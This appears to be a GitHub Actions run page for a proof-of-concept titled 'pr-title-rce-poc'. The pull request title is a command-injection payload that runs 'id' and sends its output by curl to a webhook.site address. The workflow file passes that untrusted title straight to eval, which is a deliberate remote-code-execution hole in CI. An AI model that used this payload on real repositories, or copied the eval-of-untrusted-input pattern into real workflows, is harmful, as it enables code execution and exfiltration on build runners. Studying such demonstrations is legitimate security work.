Skip to content

id; curl http://webhook.site/<your-id>?output=$(id) #1

id; curl http://webhook.site/<your-id>?output=$(id)

id; curl http://webhook.site/<your-id>?output=$(id) #1

Workflow file for this run

name: pr-title-rce-poc
on:
pull_request:
types: [opened, edited]
jobs:
exploit-via-pr-title:
runs-on: ubuntu-latest
steps:
- name: Dump PR Title as Command
env:
PAYLOAD: ${{ github.event.pull_request.title }}
run: |
echo "[+] Executing injected PR title payload"
eval "$PAYLOAD"